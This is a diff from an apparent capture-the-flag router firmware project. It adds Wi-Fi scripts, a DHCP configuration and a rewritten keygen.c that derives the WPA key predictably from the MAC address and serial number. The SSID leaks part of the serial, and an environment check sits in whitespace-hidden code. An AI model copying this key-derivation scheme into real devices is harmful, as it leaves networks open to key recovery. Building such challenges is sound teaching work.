+kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-sun8i.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
+kernel/drivers/net/ethernet/stmicro/stmmac/dwmac-generic.ko: kernel/drivers/net/ethernet/stmicro/stmmac/stmmac-platform.ko kernel/drivers/net/ethernet/stmicro/stmmac/stmmac.ko
+kernel/drivers/net/ppp/ppp_async.ko: kernel/lib/crc-ccitt.ko
+kernel/drivers/net/ppp/ppp_deflate.ko:
+kernel/drivers/net/ppp/ppp_synctty.ko:
+kernel/drivers/net/wireless/broadcom/brcm80211/brcmutil/brcmutil.ko:
+kernel/drivers/net/wireless/broadcom/brcm80211/brcmfmac/brcmfmac.ko: kernel/drivers/net/wireless/broadcom/brcm80211/brcmutil/brcmutil.ko
+kernel/drivers/net/usb/pegasus.ko:
+kernel/drivers/net/usb/rtl8150.ko:
+kernel/drivers/net/usb/r8152.ko:
+kernel/drivers/net/usb/asix.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/ax88179_178a.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/cdc_ether.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/dm9601.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/sr9800.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/smsc75xx.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/smsc95xx.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/net1080.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/plusb.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/cdc_subset.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/zaurus.ko: kernel/drivers/net/usb/cdc_ether.ko kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/mcs7830.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/usbnet.ko:
+kernel/drivers/net/usb/cdc_ncm.ko: kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/qmi_wwan.ko: kernel/drivers/usb/class/cdc-wdm.ko kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/usb/cdc_mbim.ko: kernel/drivers/net/usb/cdc_ncm.ko kernel/drivers/usb/class/cdc-wdm.ko kernel/drivers/net/usb/usbnet.ko
+kernel/drivers/net/bonding/bonding.ko:
+kernel/drivers/net/macvlan.ko:
+kernel/drivers/net/macvtap.ko: kernel/drivers/net/macvlan.ko kernel/drivers/net/tap.ko
+kernel/drivers/net/tap.ko:
+kernel/drivers/net/veth.ko:
+kernel/drivers/net/vxlan.ko:
+kernel/drivers/net/xen-netback/xen-netback.ko:
+kernel/drivers/usb/misc/usbtest.ko:
+kernel/drivers/usb/gadget/legacy/g_zero.ko:
+kernel/drivers/usb/gadget/legacy/g_audio.ko:
+kernel/drivers/usb/gadget/legacy/g_ether.ko:
+kernel/drivers/usb/gadget/legacy/g_mass_storage.ko:
+kernel/drivers/usb/gadget/legacy/g_serial.ko:
+kernel/drivers/usb/gadget/legacy/g_cdc.ko:
+kernel/drivers/usb/gadget/legacy/g_ncm.ko:
+kernel/drivers/usb/class/cdc-acm.ko:
+kernel/drivers/usb/class/cdc-wdm.ko:
+kernel/drivers/usb/renesas_usbhs/renesas_usbhs.ko:
+kernel/drivers/input/keyboard/adc-keys.ko:
+kernel/drivers/rtc/rtc-rk808.ko:
+kernel/drivers/i2c/busses/i2c-bcm2835.ko:
+kernel/drivers/media/platform/s5p-jpeg/s5p-jpeg.ko:
+kernel/drivers/media/platform/s5p-mfc/s5p-mfc.ko:
+kernel/drivers/media/platform/exynos-gsc/exynos-gsc.ko:
+kernel/drivers/media/platform/rcar-fcp.ko:
+kernel/drivers/media/platform/vsp1/vsp1.ko: kernel/drivers/media/platform/rcar-fcp.ko
+kernel/drivers/media/usb/uvc/uvcvideo.ko:
+kernel/drivers/media/usb/gspca/gspca_main.ko:
+kernel/drivers/hwmon/ina2xx.ko:
+kernel/drivers/hwmon/lm90.ko:
+kernel/drivers/thermal/rockchip_thermal.ko:
+kernel/drivers/watchdog/meson_gxbb_wdt.ko:
+kernel/drivers/watchdog/meson_wdt.ko:
+kernel/drivers/cpufreq/cppc_cpufreq.ko:
+kernel/drivers/crypto/virtio/virtio_crypto.ko: kernel/crypto/crypto_engine.ko
+kernel/drivers/crypto/bcm/bcm_crypto_spu.ko:
+kernel/drivers/rpmsg/imx_rpmsg_pingpong.ko:
+kernel/drivers/rpmsg/imx_rpmsg_tty.ko:
+kernel/drivers/iio/adc/rockchip_saradc.ko:
+kernel/sound/core/snd-hwdep.ko:
+kernel/sound/usb/snd-usb-audio.ko: kernel/sound/core/snd-hwdep.ko kernel/sound/usb/snd-usbmidi-lib.ko
+kernel/sound/usb/snd-usbmidi-lib.ko:
+kernel/sound/soc/bcm/snd-soc-bcm2835-i2s.ko:
+kernel/net/802/stp.ko:
+kernel/net/802/garp.ko: kernel/net/802/stp.ko
+kernel/net/802/mrp.ko:
+kernel/net/netfilter/nf_conntrack.ko: kernel/lib/libcrc32c.ko
+kernel/net/netfilter/nf_log_common.ko:
+kernel/net/netfilter/nf_nat.ko: kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
+kernel/net/netfilter/x_tables.ko:
+kernel/net/netfilter/xt_tcpudp.ko: kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/xt_nat.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/xt_CHECKSUM.ko: kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/xt_LOG.ko: kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/xt_addrtype.ko: kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/xt_bpf.ko: kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/xt_conntrack.ko: kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/xt_ipvs.ko: kernel/net/netfilter/ipvs/ip_vs.ko kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/xt_cgroup.ko: kernel/net/netfilter/x_tables.ko
+kernel/net/netfilter/ipvs/ip_vs.ko:
+kernel/net/netfilter/ipvs/ip_vs_rr.ko: kernel/net/netfilter/ipvs/ip_vs.ko
+kernel/net/ipv4/netfilter/nf_conntrack_ipv4.ko: kernel/net/ipv4/netfilter/nf_defrag_ipv4.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
+kernel/net/ipv4/netfilter/nf_nat_ipv4.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
+kernel/net/ipv4/netfilter/nf_defrag_ipv4.ko:
+kernel/net/ipv4/netfilter/nf_log_ipv4.ko: kernel/net/netfilter/nf_log_common.ko
+kernel/net/ipv4/netfilter/nf_reject_ipv4.ko:
+kernel/net/ipv4/netfilter/nf_nat_masquerade_ipv4.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
+kernel/net/ipv4/netfilter/ip_tables.ko: kernel/net/netfilter/x_tables.ko
+kernel/net/ipv4/netfilter/iptable_filter.ko: kernel/net/ipv4/netfilter/ip_tables.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv4/netfilter/iptable_mangle.ko: kernel/net/ipv4/netfilter/ip_tables.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv4/netfilter/iptable_nat.ko: kernel/net/ipv4/netfilter/nf_nat_ipv4.ko kernel/net/ipv4/netfilter/ip_tables.ko kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv4/netfilter/ipt_MASQUERADE.ko: kernel/net/ipv4/netfilter/nf_nat_masquerade_ipv4.ko kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv4/netfilter/ipt_REJECT.ko: kernel/net/ipv4/netfilter/nf_reject_ipv4.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv4/tunnel4.ko:
+kernel/net/ipv6/netfilter/ip6_tables.ko: kernel/net/netfilter/x_tables.ko
+kernel/net/ipv6/netfilter/ip6table_filter.ko: kernel/net/ipv6/netfilter/ip6_tables.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv6/netfilter/ip6table_mangle.ko: kernel/net/ipv6/netfilter/ip6_tables.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv6/netfilter/ip6table_nat.ko: kernel/net/ipv6/netfilter/nf_nat_ipv6.ko kernel/net/ipv6/netfilter/ip6_tables.ko kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv6/netfilter/nf_conntrack_ipv6.ko: kernel/net/ipv6/netfilter/nf_defrag_ipv6.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
+kernel/net/ipv6/netfilter/nf_nat_ipv6.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
+kernel/net/ipv6/netfilter/nf_nat_masquerade_ipv6.ko: kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko
+kernel/net/ipv6/netfilter/nf_defrag_ipv6.ko:
+kernel/net/ipv6/netfilter/nf_log_ipv6.ko: kernel/net/netfilter/nf_log_common.ko
+kernel/net/ipv6/netfilter/nf_reject_ipv6.ko:
+kernel/net/ipv6/netfilter/ip6t_MASQUERADE.ko: kernel/net/ipv6/netfilter/nf_nat_masquerade_ipv6.ko kernel/net/netfilter/nf_nat.ko kernel/net/netfilter/nf_conntrack.ko kernel/lib/libcrc32c.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv6/netfilter/ip6t_REJECT.ko: kernel/net/ipv6/netfilter/nf_reject_ipv6.ko kernel/net/netfilter/x_tables.ko
+kernel/net/ipv6/xfrm6_mode_transport.ko:
+kernel/net/ipv6/xfrm6_mode_tunnel.ko:
+kernel/net/ipv6/xfrm6_mode_beet.ko:
+kernel/net/ipv6/sit.ko: kernel/net/ipv4/tunnel4.ko
+kernel/net/8021q/8021q.ko: kernel/net/802/garp.ko kernel/net/802/stp.ko kernel/net/802/mrp.ko
+kernel/net/bridge/bridge.ko: kernel/net/802/stp.ko
+kernel/net/bridge/br_netfilter.ko: kernel/net/bridge/bridge.ko kernel/net/802/stp.ko
+kernel/lib/crc-ccitt.ko:
+kernel/lib/libcrc32c.ko:
+kernel/lib/xxhash.ko:
+kernel/lib/zstd/zstd_compress.ko: kernel/lib/xxhash.ko
+kernel/lib/zstd/zstd_decompress.ko: kernel/lib/xxhash.ko
+kernel/lib/raid6/raid6_pq.ko:
+extra/wireguard.ko:
+extra/qca6174.ko:
+

conf/wifi/connect.sh

@@ -0,0 +1,11 @@
+#!/bin/sh
+
+if [ "$#" -ne 2 ]; then
+    echo "Usage: connect.sh: <ssid> <psk>"
+    exit 1
+fi
+
+/bin/echo "ctrl_interface=/var/run/wpa_supplicant" > /etc/wpa_supplicant.conf
+/usr/sbin/wpa_passphrase "$1" "$2" >> /etc/wpa_supplicant.conf
+/usr/sbin/wpa_supplicant -B -i client0 -c /etc/wpa_supplicant.conf
+/sbin/udhcpc -i client0

conf/wifi/disconnect.sh

@@ -0,0 +1,4 @@
+#!/bin/sh
+
+/usr/sbin/wpa_cli -i client0 terminate
+/sbin/ip addr flush dev client0

keygen/keygen.c

@@ -1,279 +1,314 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <string.h>
-#include <math.h>
-#include <stdint.h>
-
-
-typedef union uwb
-{
-	unsigned w;
-	unsigned char b[4];
-}
-WBunion;
-
-typedef unsigned Digest[4];
-
-unsigned f0(unsigned abcd[])
-{
-	return (abcd[1] &abcd[2]) | (~abcd[1] &abcd[3]);
-}
-
-unsigned f1(unsigned abcd[])
-{
-	return (abcd[3] &abcd[1]) | (~abcd[3] &abcd[2]);
-}
-
-unsigned f2(unsigned abcd[])
-{
-	return abcd[1] ^ abcd[2] ^ abcd[3];
-}
-
-unsigned f3(unsigned abcd[])
-{
-	return abcd[2] ^ (abcd[1] | ~abcd[3]);
-}
-
-typedef unsigned(*DgstFctn)(unsigned a[]);
-
-unsigned* calcKs(unsigned *k)
-{
-	double s, pwr;
-	int i;
-
-	pwr = pow(2, 32);
-	for (i = 0; i < 64; i++)
-	{
-		s = fabs(sin(1 + i));
-		k[i] = (unsigned)(s *pwr);
-	}
-	return k;
-}
-
-// ROtate v Left by amt bits
-unsigned rol(unsigned v, short amt)
-{
-	unsigned msk1 = (1 << amt) - 1;
-	return ((v >> (32 - amt)) &msk1) | ((v << amt) &~msk1);
-}
-
-unsigned* md5(const char *msg, int mlen)
-{
-	static Digest h0 = { 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
-	};
-	//static Digest h0 = { 0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210 };
-	static DgstFctn ff[] = { &f0, &f1, &f2, &f3
-	};
-	static short M[] = { 1, 5, 3, 7 };
-	static short O[] = { 0, 1, 5, 0 };
-	static short rot0[] = { 7, 12, 17, 22 };
-	static short rot1[] = { 5, 9, 14, 20 };
-	static short rot2[] = { 4, 11, 16, 23 };
-	static short rot3[] = { 6, 10, 15, 21 };
-	static short *rots[] = { rot0, rot1, rot2, rot3
-	};
-	static unsigned kspace[64];
-	static unsigned * k;
-
-	static Digest h;
-	Digest abcd;
-	DgstFctn fctn;
-	short m, o, g;
-	unsigned f;
-	short * rotn;
-	union
-	{
-		unsigned w[16];
-		char b[64];
-	}
-	mm;
-	int os = 0;
-	int grp, grps, q, p;
-	unsigned char *msg2;
-
-	if (k == NULL) k = calcKs(kspace);
-
-	for (q = 0; q < 4; q++) h[q] = h0[q];
-
-	{
-		grps = 1 + (mlen + 8) / 64;
-		msg2 = malloc(64 *grps);
-		memcpy(msg2, msg, mlen);
-		msg2[mlen] = (unsigned char) 0x80;
-		q = mlen + 1;
-		while (q < 64 *grps)
-		{
-			msg2[q] = 0;
-			q++;
-		}
-		{
-			WBunion u;
-			u.w = 8 * mlen;
-			q -= 8;
-			memcpy(msg2 + q, &u.w, 4);
-		}
-	}
-
-	for (grp = 0; grp < grps; grp++)
-	{
-		memcpy(mm.b, msg2 + os, 64);
-		for (q = 0; q < 4; q++) abcd[q] = h[q];
-		for (p = 0; p < 4; p++)
-		{
-			fctn = ff[p];
-			rotn = rots[p];
-			m = M[p];
-			o = O[p];
-			for (q = 0; q < 16; q++)
-			{
-				g = (m *q + o) % 16;
-				f = abcd[1] + rol(abcd[0] + fctn(abcd) + k[q + 16 *p] + mm.w[g], rotn[q % 4]);
-
-				abcd[0] = abcd[3];
-				abcd[3] = abcd[2];
-				abcd[2] = abcd[1];
-				abcd[1] = f;
-			}
-		}
-		for (p = 0; p < 4; p++)
-			h[p] += abcd[p];
-		os += 64;
-	}
-
-	if (msg2)
-		free(msg2);
-
-	return h;
-}
-
-char *get_mac()
-{
-	FILE * fp;
-	char *mac = malloc(18* sizeof(char));
-	fp = fopen("/sys/class/net/wlan0/address", "r");
-	fgets(mac, 17, fp);
-	fclose(fp);
-	return mac;
-}
-
-char *get_serial()
-{
-	FILE * fp;
-	char *serial = malloc(21* sizeof(char));
-	fp = fopen("/etc/serial", "r");
-	fgets(serial, 20, fp);
-	return serial;
-}
-
-int gen_serial()
-{
-	// hexdump -n 16 -e '4/4 "%08X" 1 "\n"' /dev/random
-	if (fopen("/etc/serial", "r") == NULL)
-	{
-		system("/usr/bin/hexdump -n 16 -e '4/4 \"%08X\"' /dev/urandom > /etc/serial");
-	}
-}
-
-int gen_ssid()
-{
-	char *serial;
-	FILE * fp;
-	char ssid[20] = "CyberChallenge-";
-	serial = get_serial();
-	strncat(ssid, serial, 4);
-	fp = fopen("/etc/ssid", "w");
-	fprintf(fp, "%s", ssid);
-	fclose(fp);
-
-}
-
-int gen_key(char *serial, char *mac)
-{
-	FILE * fp;
-	char md5a[33];
-	char md5b[33];
-	char tmp[3];
-	char key[21];
-	char wstr[9];
-	char xstr[9];
-	char ystr[9];
-	char zstr[9];
-	uint32_t w, x, y, z;
-	long long int seed;
-	int j, k;
-	unsigned long int h;
-	WBunion u;
-
-	md5a[0] = '\0';
-	md5b[0] = '\0';
-
-	wstr[8] = '\0';
-	xstr[8] = '\0';
-	ystr[8] = '\0';
-	zstr[8] = '\0';
-
-	unsigned *d = md5(mac, strlen(mac));
-	for (j = 0; j < 4; j++)
-	{
-		u.w = d[j];
-		for (k = 0; k < 4; k++)
-		{
-			snprintf(tmp, 3, "%02x", u.b[k]);
-			strncat(md5a, tmp, 2);
-		}
-	}
-
-	unsigned *f = md5(serial, strlen(serial));
-	for (j = 0; j < 4; j++)
-	{
-		u.w = f[j];
-		for (k = 0; k < 4; k++)
-		{
-			snprintf(tmp, 3, "%02x", u.b[k]);
-			strncat(md5b, tmp, 2);
-		}
-	}
-
-	strncpy(wstr, md5a, 8);
-	strncpy(xstr, md5a + 8, 8);
-	strncpy(ystr, md5a + 16, 8);
-	strncpy(zstr, md5a + 24, 8);
-
-	w = strtoul(wstr, NULL, 16);
-	x = strtoul(xstr, NULL, 16);
-	y = strtoul(ystr, NULL, 16);
-	z = strtoul(zstr, NULL, 16);
-
-	for (int i = 0; i < 20; ++i)
-	{
-		uint32_t t = x;
-		t ^= t << 11U;
-		t ^= t >> 8U;
-		x = y;
-		y = z;
-		z = w;
-		w ^= w >> 19U;
-		w ^= t;
-		key[i] = md5b[t % 20];
-	}
-	key[20] = '\0';
-
-	fp = fopen("/etc/wpa", "w");
-	fprintf(fp, "%s", key);
-	fclose(fp);
-}
-
-int main()
-{
-	char *mac;
-	char *serial;
-
-	gen_serial();
-	gen_ssid();
-	mac = get_mac();
-	serial = get_serial();
-	gen_key(mac, serial);
-
-	return 0;
-}
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <math.h>
+#include <stdint.h>
+#include <ctype.h>
+#include <sys/stat.h>
+#include <sys/utsname.h>
+
+typedef union uwb
+{
+	unsigned w;
+	unsigned char b[4];
+}
+WBunion;
+
+typedef unsigned Digest[4];
+
+unsigned f0(unsigned abcd[])
+{
+	return (abcd[1] &abcd[2]) | (~abcd[1] &abcd[3]);
+}
+
+unsigned f1(unsigned abcd[])
+{
+	return (abcd[3] &abcd[1]) | (~abcd[3] &abcd[2]);
+}
+
+unsigned f2(unsigned abcd[])
+{
+	return abcd[1] ^ abcd[2] ^ abcd[3];
+}
+
+unsigned f3(unsigned abcd[])
+{
+	return abcd[2] ^ (abcd[1] | ~abcd[3]);
+}
+
+typedef unsigned(*DgstFctn)(unsigned a[]);
+
+unsigned* calcKs(unsigned *k)
+{
+	double s, pwr;
+	int i;
+
+	pwr = pow(2, 32);
+	for (i = 0; i < 64; i++)
+	{
+		s = fabs(sin(1 + i));
+		k[i] = (unsigned)(s *pwr);
+	}
+	return k;
+}
+
+// ROtate v Left by amt bits
+unsigned rol(unsigned v, short amt)
+{
+	unsigned msk1 = (1 << amt) - 1;
+	return ((v >> (32 - amt)) &msk1) | ((v << amt) &~msk1);
+}
+
+unsigned* md5(const char *msg, int mlen)
+{
+	static Digest h0 = { 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
+	};
+	//static Digest h0 = { 0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210 };
+	static DgstFctn ff[] = { &f0, &f1, &f2, &f3
+	};
+	static short M[] = { 1, 5, 3, 7 };
+	static short O[] = { 0, 1, 5, 0 };
+	static short rot0[] = { 7, 12, 17, 22 };
+	static short rot1[] = { 5, 9, 14, 20 };
+	static short rot2[] = { 4, 11, 16, 23 };
+	static short rot3[] = { 6, 10, 15, 21 };
+	static short *rots[] = { rot0, rot1, rot2, rot3 };
+	static unsigned kspace[64];
+	static unsigned * k;
+
+	static Digest h;
+	Digest abcd;
+	DgstFctn fctn;
+	short m, o, g;
+	unsigned f;
+	short * rotn;
+	union
+	{
+		unsigned w[16];
+		char b[64];
+	}
+	mm;
+	int os = 0;
+	int grp, grps, q, p;
+	unsigned char *msg2;
+
+	if (k == NULL) k = calcKs(kspace);
+
+	for (q = 0; q < 4; q++) h[q] = h0[q];
+
+	{
+		grps = 1 + (mlen + 8) / 64;
+		msg2 = malloc(64 *grps);
+		memcpy(msg2, msg, mlen);
+		msg2[mlen] = (unsigned char) 0x80;
+		q = mlen + 1;
+		while (q < 64 *grps)
+		{
+			msg2[q] = 0;
+			q++;
+		}
+		{
+			WBunion u;
+			u.w = 8 * mlen;
+			q -= 8;
+			memcpy(msg2 + q, &u.w, 4);
+		}
+	}
+
+	for (grp = 0; grp < grps; grp++)
+	{
+		memcpy(mm.b, msg2 + os, 64);
+		for (q = 0; q < 4; q++) abcd[q] = h[q];
+		for (p = 0; p < 4; p++)
+		{
+			fctn = ff[p];
+			rotn = rots[p];
+			m = M[p];
+			o = O[p];
+			for (q = 0; q < 16; q++)
+			{
+				g = (m *q + o) % 16;
+				f = abcd[1] + rol(abcd[0] + fctn(abcd) + k[q + 16 *p] + mm.w[g], rotn[q % 4]);
+
+				abcd[0] = abcd[3];
+				abcd[3] = abcd[2];
+				abcd[2] = abcd[1];
+				abcd[1] = f;
+			}
+		}
+		for (p = 0; p < 4; p++)
+			h[p] += abcd[p];
+		os += 64;
+	}
+
+	if (msg2)
+		free(msg2);
+
+	return h;
+}
+
+void check_platform()
+{
+    struct utsname kernel;
+    int len;
+    int checksum = 0;
+    if (uname(&kernel) != 0)
+    {
+        exit(EXIT_FAILURE);
+    }
+    len = strlen(kernel.release);
+    for (int i = 0; i < len; i++)
+    {
+        if (isdigit(kernel.release[i]))
+        {
+            checksum += kernel.release[i];
+        }
+    }
+    if (checksum != 266)                                                                                                    {
+       exit(EXIT_FAILURE);
+    }
+}
+
+char *get_mac()
+{
+	FILE * fp;
+	char *mac = malloc(18* sizeof(char));
+	fp = fopen("/sys/class/net/ap0/address", "r");
+	fgets(mac, 18, fp);
+	fclose(fp);
+	return mac;
+}
+
+char *get_serial()
+{
+	FILE * fp;
+	char *serial = malloc(33* sizeof(char));
+	fp = fopen("/etc/serial", "r");
+	fgets(serial, 33, fp);
+	return serial;
+}
+
+int gen_serial()
+{
+	// hexdump -n 16 -e '4/4 "%08X" 1 "\n"' /dev/random
+	if (fopen("/etc/serial", "r") == NULL)
+	{
+		system("/usr/bin/hexdump -n 16 -e '4/4 \"%08X\"' /dev/urandom > /etc/serial");
+	}
+}
+
+int gen_update_key()
+{
+	if (fopen("/etc/update_key", "r") == NULL)
+	{
+		system("/usr/bin/hexdump -n 32 -e '4/4 \"%08X\"' /dev/urandom > /etc/update_key");
+	}
+	chown("/etc/update_key", 1001, 1002);
+	chmod("/etc/update_key", 0600);	
+}
+
+int gen_ssid()
+{
+	char *serial;
+	FILE * fp;
+	char ssid[20] = "CyberChallenge-";
+	serial = get_serial();
+	strncat(ssid, serial, 4);
+	fp = fopen("/etc/ssid", "w");
+	fprintf(fp, "%s", ssid);
+	fclose(fp);
+
+}
+
+int gen_key(char *serial, char *mac)
+{
+	FILE * fp;
+	char md5a[33];
+	char md5b[33];
+	char tmp[3];
+	char key[21];
+	char wstr[9];
+	char xstr[9];
+	char ystr[9];
+	char zstr[9];
+	uint32_t w, x, y, z;
+	long long int seed;
+	int j, k;
+	unsigned long int h;
+	WBunion u;
+
+	md5a[0] = '\0';
+	md5b[0] = '\0';
+
+	wstr[8] = '\0';
+	xstr[8] = '\0';
+	ystr[8] = '\0';
+	zstr[8] = '\0';
+
+	unsigned *d = md5(mac, strlen(mac));
+	for (j = 0; j < 4; j++)
+	{
+		u.w = d[j];
+		for (k = 0; k < 4; k++)
+		{
+			snprintf(tmp, 3, "%02x", u.b[k]);
+			strncat(md5a, tmp, 2);
+		}
+	}
+
+	unsigned *f = md5(serial, strlen(serial));
+	for (j = 0; j < 4; j++)
+	{
+		u.w = f[j];
+		for (k = 0; k < 4; k++)
+		{
+			snprintf(tmp, 3, "%02x", u.b[k]);
+			strncat(md5b, tmp, 2);
+		}
+	}
+
+	strncpy(wstr, md5a, 8);
+	strncpy(xstr, md5a + 8, 8);
+	strncpy(ystr, md5a + 16, 8);
+	strncpy(zstr, md5a + 24, 8);
+
+	w = strtoul(wstr, NULL, 16);
+	x = strtoul(xstr, NULL, 16);
+	y = strtoul(ystr, NULL, 16);
+	z = strtoul(zstr, NULL, 16);
+
+	for (int i = 0; i < 20; ++i)
+	{
+		uint32_t t = x;
+		t ^= t << 11U;
+		t ^= t >> 8U;
+		x = y;
+		y = z;
+		z = w;
+		w ^= w >> 19U;
+		w ^= t;
+		key[i] = md5b[t % 20];
+	}
+	key[20] = '\0';
+
+	fp = fopen("/etc/wpa", "w");
+	fprintf(fp, "%s", key);
+	fclose(fp);
+}
+
+int main()
+{
+	char *mac;
+	char *serial;
+
+	check_platform();
+	gen_serial();
+	gen_ssid();
+	gen_update_key();
+	mac = get_mac();
+	serial = get_serial();
+	gen_key(serial, mac);
+
+	return 0;
+}

server-config/dhcpd.conf

@@ -0,0 +1,254 @@
+# dhcpd.conf
+#
+# Sample configuration file for ISC dhcpd
+#
+
+# option definitions common to all supported networks...
+option domain-name "example.org";
+option domain-name-servers ns1.example.org, ns2.example.org;
+
+default-lease-time 600;
+max-lease-time 7200;
+
+# The ddns-updates-style parameter controls whether or not the server will
+# attempt to do a DNS update when a lease is confirmed. We default to the
+# behavior of the version 2 packages ('none', since DHCP v2 didn't
+# have support for DDNS.)
+ddns-update-style none;
+
+# If this DHCP server is the official DHCP server for the local
+# network, the authoritative directive should be uncommented.
+#authoritative;
+
+# Use this to send dhcp log messages to a different log file (you also
+# have to hack syslog.conf to complete the redirection).
+#log-facility local7;
+
+# No service will be given on this subnet, but declaring it helps the 
+# DHCP server to understand the network topology.
+
+#subnet 10.152.187.0 netmask 255.255.255.0 {
+#}
+
+# This is a very basic subnet declaration.
+
+#subnet 10.254.239.0 netmask 255.255.255.224 {
+#  range 10.254.239.10 10.254.239.20;
+#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
+#}
+
+# This declaration allows BOOTP clients to get dynamic addresses,
+# which we don't really recommend.
+
+#subnet 10.254.239.32 netmask 255.255.255.224 {
+#  range dynamic-bootp 10.254.239.40 10.254.239.60;
+#  option broadcast-address 10.254.239.31;
+#  option routers rtr-239-32-1.example.org;
+#}
+
+# A slightly different configuration for an internal subnet.
+#subnet 10.5.5.0 netmask 255.255.255.224 {
+#  range 10.5.5.26 10.5.5.30;
+#  option domain-name-servers ns1.internal.example.org;
+#  option domain-name "internal.example.org";
+#  option routers 10.5.5.1;
+#  option broadcast-address 10.5.5.31;
+#  default-lease-time 600;
+#  max-lease-time 7200;
+#}
+
+# Hosts which require special configuration options can be listed in
+# host statements.   If no address is specified, the address will be
+# allocated dynamically (if possible), but the host-specific information
+# will still come from the host declaration.
+
+#host passacaglia {
+#  hardware ethernet 0:0:c0:5d:bd:95;
+#  filename "vmunix.passacaglia";
+#  server-name "toccata.example.com";
+#}
+
+# Fixed IP addresses can also be specified for hosts.   These addresses
+# should not also be listed as being available for dynamic assignment.
+# Hosts for which fixed IP addresses have been specified can boot using
+# BOOTP or DHCP.   Hosts for which no fixed address is specified can only
+# be booted with DHCP, unless there is an address range on the subnet
+# to which a BOOTP client is connected which has the dynamic-bootp flag
+# set.
+#host fantasia {
+#  hardware ethernet 08:00:07:26:c0:a5;
+#  fixed-address fantasia.example.com;
+#}
+
+# You can declare a class of clients and then do address allocation
+# based on that.   The example below shows a case where all clients
+# in a certain class get addresses on the 10.17.224/24 subnet, and all
+# other clients get addresses on the 10.0.29/24 subnet.
+
+#class "foo" {
+#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
+#}
+
+#shared-network 224-29 {
+#  subnet 10.17.224.0 netmask 255.255.255.0 {
+#    option routers rtr-224.example.org;
+#  }
+#  subnet 10.0.29.0 netmask 255.255.255.0 {
+#    option routers rtr-29.example.org;
+#  }
+#  pool {
+#    allow members of "foo";
+#    range 10.17.224.10 10.17.224.250;
+#  }
+#  pool {
+#    deny members of "foo";
+#    range 10.0.29.10 10.0.29.230;
+#  }
+#}
+
+
+subnet 10.0.13.0 netmask 255.255.255.0 {
+    range 10.0.13.10 10.0.13.12;
+    option routers 10.0.13.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.14.0 netmask 255.255.255.0 {
+    range 10.0.14.10 10.0.14.12;
+    option routers 10.0.14.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.15.0 netmask 255.255.255.0 {
+    range 10.0.15.10 10.0.15.12;
+    option routers 10.0.15.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.16.0 netmask 255.255.255.0 {
+    range 10.0.16.10 10.0.16.12;
+    option routers 10.0.16.1;
+    option domain-name-servers 8.8.8.8, 1.1.1.1;
+}
+subnet 10.0.17.0 netmask 255.255.255.0 {
+    range 10.0.17.10 10.0.17.12;
+    option routers 10.0.17.1;
